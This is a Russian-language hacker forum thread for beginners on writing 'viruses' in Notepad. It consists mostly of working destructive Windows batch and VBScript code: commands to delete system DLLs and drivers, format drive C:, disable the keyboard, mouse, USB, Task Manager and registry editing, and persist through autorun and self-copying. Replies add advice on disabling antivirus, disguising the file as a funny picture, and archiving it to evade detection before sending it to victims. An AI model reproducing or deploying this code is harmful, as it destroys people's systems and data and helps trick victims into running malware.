Хакерский форум

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Хакерский форум » Для новичков » НАПИСАНИЕ ВИРУСА В БОЛОКНОТЕ


НАПИСАНИЕ ВИРУСА В БОЛОКНОТЕ

Сообщений 1 страница 28 из 28

1

Bat-Вирусы

Вы наверное уже слышали о .bat файлах, но сейчас мы поговорим о bat- вирусах. Что бы сделать bat-вирус надо:

1) Открыть болокнот

2) В вести команду

3) Нажать Файл - Сохранить как... - В место *.txt написать имя файла.bat

А вот словарь команд:

rundll32 keyboard,disable – Отключаем клаву, на случай если юзер поймет что происходит и надумает нажать CTRL+C

rundll32 mouse,disable – Отключаем мышь тоже на всякий.

copy 0 %windir/system – Копируемся в папку windows/system

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f – Запретить диспейчер задач

del "%SystemRoot%system32*.dll" /q – Удалить все системные DLL(Динамические загружаемые библиотеки)

del "%SystemRoot%Driver Cachei386driver.cab" /f /q – Удалить все драйверы, установленные на компьютере

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f – Делает невозможным запуск приложений

time 0:00 – Поставить время на 00:00

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 1 /f – Запретить редактирование реестра вручную

del "%SystemRoot%Cursors*.*" – Удалить курсор мыши

del "%SystemRoot%Media" /q – Удалить системные звуки Windows

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f – Запретить вызов панели кправления

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f – Убрать рабочий стол

shutdown -r -t 1 -c "lol" -f – перезагрузка ПК

shutdown -s -t 1 -c "lol" -f – выключение ПК

label C:Диск – Переименовать диск С:

chcp 1251
msg * "Текст сообщения" – Показать Windows-стилизованное сообщение с кнопкой ОК

del "%0" – Самоликвидация вируса

cls – Выходим

net user "х" /add - добавит на компьютер пользователя под именем

color 40 - делаем фон файла красным, а буквы чёрными

assoc .х=.у - переделает все файлы, на компьютере, форматом х на у

C:\WINDOWS\COMMAND\format c: /autotest или Cd\ - форматирование дика С:/
Format C:\
Y
Y
Y

Cd\ - снос винд
Cd C:
Сd windows
cd system
del *.dll
del *.exe
Cd\
Cd C:
Сd winMe
Del *.exe
Del *.ini
Del *.com
Cd\
Cd win98
Cd system
Del *.dll
Del *.exe

copy %0 Диск:run.bat - заражает диск(флэшку дескету и т.п.)

echo c:virus.bat>>c:autoexec.bat - удаляет всё кроме вируса

reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\RestrictRun
/v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
-запрет запуска програм

rundll32 shell32, SHExitWindowsEx 1 - выключить ПК

rundll32 shell32, SHExitWindowsEx 2 - перегрузить ПК

rundll32 user,disableoemlayer - сбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.

rundll32 user,SetCaretBlinkTime n - задать частоту мигания курсора, соответствующую значению параметра n.

: x ;
Start mspaint - предназначен для бесконечного запуска определённой программы ( здесь указана пайнт).
goto x ;

rundll32 user,SwapMouseButton - поменять местами клавиши мыши (обратная смена невозможна)
------------------------------------------------------------------------------------------------------------------------------------------------------
Кстати есть одна программа которая делает из этого файла exe и добавляет иконку, прога называется Bat To Exe Converter.

Удачи)

примеры
set lights = createobject("wscript.shell")
lights.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\disabletaskmgr", "1" ,"REG_DWORD"
application.minimizeall
lights.regwrite"HKCR\exefile\shell\open\command\","rundll32.exe"
lights.regwrite "HKEY_CURRENT_USER\Control Panel\International\sTimeFormat","ЧМО ТУПОЕ"
lights.run "C:\WINDOWS\system32\ping.exe 127.0.0.1 /t /l 65500", 0
lights.run "C:\WINDOWS\system32\ping.exe 127.0.0.1 /t /l 65500", 0
lights.run "C:\WINDOWS\system32\ping.exe 127.0.0.1 /t /l 65500", 0
lights.run "C:\WINDOWS\system32\ping.exe 127.0.0.1 /t /l 65500", 0
lights.run "C:\WINDOWS\system32\ping.exe 127.0.0.1 /t /l 65500", 0
lights.run"reg add ""hklm\system\currentcontrolset\control\keyboard layout"" /v ""Scancode Map"" /t REG_BINARY /d 0000000000000000A000000000005DE000000E0000003A00000053E000004FE000001C0000000100000047E0000052E00000380000001D0000002A0000005BE000004500000051E0000049E000005EE0000037E0000038E000001DE00000360000005CE00000460000005FE00000390000000F00000063E00000280000000C000000330000003400000035000000270000001A0000002B0000001B000000290000000D0000000B00000002000000030000000400000005000000060000000700000008000000090000000A0000001E000000300000002E0000002000000012000000210000002200000023000000170000002400000025000000260000003200000031000000180000001900000010000000130000001F00000014000000160000002F000000110000002D000000150000002C0000003B0000003C0000003D0000003E0000003F00000040000000410000004200000043000000440000005700000058000000640000006500000066000000520000004F00000050000000510000004B0000004C0000004D0000004700000048000000490000004A000000370000005300000035E000004E0000001CE0000050E000004BE000004DE0000048E000000000",0
lights.regwrite"HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR\Start","4","REG_DWORD"
do
execute"lights.Run ""%comspec% /c "" & Chr(7), 0,True"
loop

1. Отключает диспечер задач
2. Перестают открываться *.EXE файлы
3. Вместо часов показывается надпись "ЧМО ТУПОЕ"
4. Комп жертвы наченает пинговать себя максимально большими пакетами в 5 патоков
5. Отключается клавиатура
6. Отключаются USB
7. Компьютер начинает истерично пищать системным динамиком.

и простенький

echo off
date 01.01.99
cd C\Programm Files
cd\
del *.*

0

2

Я делаю вирус,а когда его сохроняю у меня сробатывает антивирусник.И как отправить по почте вирус

0

3

viktorishka написал(а):

Я делаю вирус,а когда его сохроняю у меня сробатывает антивирусник.И как отправить по почте вирус

можеш при создании троя отрубить свой антивирь и прописать на него исключение(в антивире) и кидай его на лититбит или дипозит   соотвественно жетве даш ссыль на него   типо там картинка прикольная или еще ченить, если конечно у него антиврь не обновляется.. у многи лицензия уже давно вышла и им просто не охота искать новые ключи

ну эт мой вариант..

0

4

а как проверить будет он работать или нет ?

0

5

Virus
Отправь каму нить ксли в ответ не придет ничего или мат то работает . хд

0

6

хД, меня просто всегда интересовал вопрос, как я буду знать что мой вирус сломал кому то комп.

0

7

viktorishka написал(а):

Я делаю вирус,а когда его сохроняю у меня сробатывает антивирусник.И как отправить по почте вирус

отключи антивирь сохрани как VBS b воспользуйся программой VBS2EXE тоже вариант!!!

0

8

Я недавно  сделал бактник      и   кинул   его   в   школу  антивирь  непропалил ,   но   вирус  непрописался почему-то  в    автозагрузку???

0

9

ВСЕ  КАМАНДЫ  РАБОТАЮТ  А  В  АВТОЗАГРУЗКУ  НЕПРОПИСЫВАЕТСЯ

0

10

start explorer -раз 100-300 прописать в батнике и пи3дец  ппц винде ))

Отредактировано danil27 (2011-02-12 16:26:12)

0

11

кстати для новичков! я на себе испытал коварную команду!

вот она

assoc .exe=.mp3     (после этого запустить программы на прямую и через ярлык невозможно и антивирь не пашит после перезагрузки)
assoc .lnk=.txt 

чесно?! было страшно! долго думал :canthearyou: и вспомнил обратную команду!

вот

assoc .exe=exefile
assoc .lnk=lnkfile

Отредактировано Win32 (2011-02-12 23:10:33)

0

12

прикольно

0

13

ВОТ ЕЩЕ ОДИН! ТОЖЕ СТРАШНЫЙ!

@echo off
rundll32 keyboard,disable
rundll32 mouse,disable
copy %0 %windir%/system
echo run=%windir%/system/*.bat >> win.ini
echo run=%windir%/system/*.bat >> system.ini
label LOHOLAMMER
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat > nul
echo autoexec.bat echo YOU ARE LAMMER...xe-xe-xe > c:\autoexec.bat
rundll32 mouse,enable
rundll32 keyboard,enable
echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
pause
cls

Объясняю популярно и по шагам:

1 @echo off - Запрещаем ДОСовскому окошку показывать, что делает скрипт.
2 rundll32 keyboard,disable - Отключаем клаву, на случай если юзер поймет что происходит и надумает нажать CTRL+C
3 rundll32 mouse,disable - Отключаем мышь тоже на всякий.
4 copy %0 %windir%/system - Копируемся в папку windows/system
// %0 - Переменная, указывающая на исходный файл-вирус
// %windir% - переменная папка масдая.
5 echo run=%windir%/system/*.bat >> %windir%\win.ini - Добавляет текст "run=%windir%/system/*.bat" в файл win.ini
6 echo run=%windir%/system/*.bat >> %windir%\system.ini - Добавляет текст "run=%windir%/system/*.bat" в файл system.ini
7 label LOHOLAMMER - Меняет имя диску c:\ на "LOHOLAMMER"
8 if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r - Проверяем если есть файл c:\autoexec.bat то убираем
//у него атрибуты -h -s -a -r
9 deltree /y c:\autoexec.bat - Удаляем файл c:\autoexec.bat , если не убрать атрибуты, то программа не удалит файл.
10 echo autoexec.bat echo YOU ARE LAMMER...xe-xe-xe > c:\autoexec.bat - Добавить текст "YOU ARE LAMMER...xe-xe-xe"
//в новый файл autoexec.bat
11 rundll32 mouse,enable - Включаем, пускай думает, что ниче не было.
12 rundll32 keyboard,enable - Включаем, пускай думает, что ниче не было.
13 echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); >> %temp%\mes.js
start %temp%\mes.js. //Этот текст выводит масдайное окно с надписью
deltree /y %temp%\mes.js //А потом стирает за собой следы.
14 attrib c:\autoexec.bat +h +s +a +r - Делает файл c:\autoexec.bat скрытым и системный чтоб ламер ничего не заподозрил.
15 pause - Просим нажать любую клавишу (Не обязательно нажимать ведь вирь уже сделал свое дело.)
16 cls - Выходим

0

14

Date 12.05.15 -строка меняет дату(какой нибудь 15 год поставил и начнет каспер плакать что лицензия 5лет назад кончилась.ну и другие проги работающие по такому же принципу)
Time 00:00 -я думаю понятно меняет время, можно любое задать
Attrib +h c:(имя вашего файла).bat -меняет атрибут вашего файла на скрытый
Echo c:(имя вашего файла).bat >>autoexec.bat -прописывает ваш файл в автозагрузку
md
md LAMER -понятно что создастся новая папка LAMER ,на первый взгляд не чего особенного. щас исправим... открываем Exel в первой ячейке пишем md 1 и оттягиваем вниз хоть на тысячу---копируем это все в блокнот соответственно... дальше я думаю все понятно,смотря сколько папок будет создаваться ну и от мощности мошины ....
assoc .exe=.mp3 -запускает все ексшники как музыка
del c:Program Files/q -удаляет все файлы из указанной папки
assoc .lnk=.txt -все ярлыки начнут открываться блокнотом
del *.* /q -удаление всех файлов , останутся только те которые находятся в той же папке в которой был запущен

ну и не забываем вконце del %0 -САМОУДАЛЕНИЕ...
=========================================================

Удачи в ваших темных делишках!!!
=========================================================

0

15

Win32 написал(а):

кстати для новичков! я на себе испытал коварную команду!

вот она

assoc .exe=.mp3     (после этого запустить программы на прямую и через ярлык невозможно и антивирь не пашит после перезагрузки)
assoc .lnk=.txt

чесно?! было страшно! долго думал :canthearyou: и вспомнил обратную команду!

вот

assoc .exe=exefile
assoc .lnk=lnkfile

браво...

0

16

Браво не то слово! Кстати в нете реально много пострадавших от самих себя! начитаются и пробуют на себе а как обратно незнают! вот угар! :D

0

17

ша на вируртуальной машине попробую

0

18

Уе, я тоже такое бы взял.. Lowese26rus отпишись пожалуйста когда протестишь

0

19

Кстати...я изменил другу дату...у него не заходило ни в контакт ни в одноклассники! Почему так? Потом он поставил нормальную дату и у него все зашло.

0

20

Win32 написал(а):

кстати для новичков! я на себе испытал коварную команду!
вот она
assoc .exe=.mp3     (после этого запустить программы на прямую и через ярлык невозможно и антивирь не пашит после перезагрузки)
assoc .lnk=.txt 
чесно?! было страшно! долго думал  и вспомнил обратную команду!
вот
assoc .exe=exefile
assoc .lnk=lnkfile

слухай тыб на виртуальной машине попробовал бы

0

21

что нужно  прописать в  батнике  чтоб  он  заработал  только  определённого числа ???

0

22

никто незнает???

0

23

по моему такого нет((( а жаль так бы хотелось))

0

24

Sankai написал(а):

по моему такого нет((( а жаль так бы хотелось))

:D

Выполнение команд по расписанию.

В WIN2K/XP существует утилита командной строки AT, позволяющая выполнить команду или пакетный файл в указанное время на локальном или удаленном компьютере. Для использования команды AT необходимо, чтобы была запущена служба планировшика заданий (обычно запущена по умолчанию при установке системы).

AT [\\имя_компьютера] [ [код] [/DELETE] | /DELETE [/YES]]

AT [\\имя_компьютера] время [/INTERACTIVE]

[ /EVERY:день[,...] | /NEXT:день[,...]] "команда"

 

\\имя_компьютера Имя удаленного компьютера. Если этот параметр опущен,

используется локальный компьютер.

код Порядковый номер запланированной задачи. Указывается если нужно отменить уже запланированную задачу с помощью ключа /delete.

/delete Отмена запланированной задачи. Если код задачи опущен,

отменяются все задачи, запланированные для указанного

компьютера.

/yes Отмена запроса на подтверждение при отмене всех

запланированных задач.

время Время запуска команды.

/interactive Разрешение взаимодействия задачи с пользователем,

работающим на компьютере во время запуска задачи. Задачи, запущенные без этого ключа невидимы для пользователя компьютера.

/every:день[,...] Запуск задачи осуществляется по указанным дням недели или

месяца. Если дата опущена, используется текущий день

месяца.

/next:день[,...] Задача будет запущена в следующий указанный день недели

(например в следующий четверг). Если дата опущена,

используется текущий день месяца.

"команда" Команда или имя пакетного файла.

 

Примеры использования:

- Аналог “будильника” , - всплывающие окна с текстом, напоминающие текущему или указанному пользователю о необходимости каких-либо действий. Для посылки сообщения пользователю используем утилиту NET.EXE

AT 13:50 net.exe send * Пора пить кофе

AT 17:50 net.exe send User Пора домой

AT \\SERVER 13:45 net.exe send Нужно перезагрузить сервер

- Просмотр списка запланированных задач:

AT

- Удаление уже спланированных задач:

AT 3 /DELETE – удаление задачи с номером 3

AT /DELETE /YES – удаление всех задач

“Панель управления” - “Назначенные задания” позволяют просматривать, изменять и удалять созданные командой AT задания.

0

25

Дальше включаем думалку  :smoke:

+1

26

о спс)) + те))

0

27

а что бы bat B exe переделать вот прога Bat-To-Exe-Converter

0

28

Есть такая программа, называется генератор вредилок, так вот с помощью нее вы можете создать неплохой вирус. Эта программа за тебя составляет выше описанное, а ты только выбираешь пункты какие тебе нужны. Если вы хотите реально навредить оппоненту, но у него стоит антивирь, то вам после создания программкой вируса, надо за архивировать. Но настроить на то, что после открытия архива вирус автоматически открывается...

0


Вы здесь » Хакерский форум » Для новичков » НАПИСАНИЕ ВИРУСА В БОЛОКНОТЕ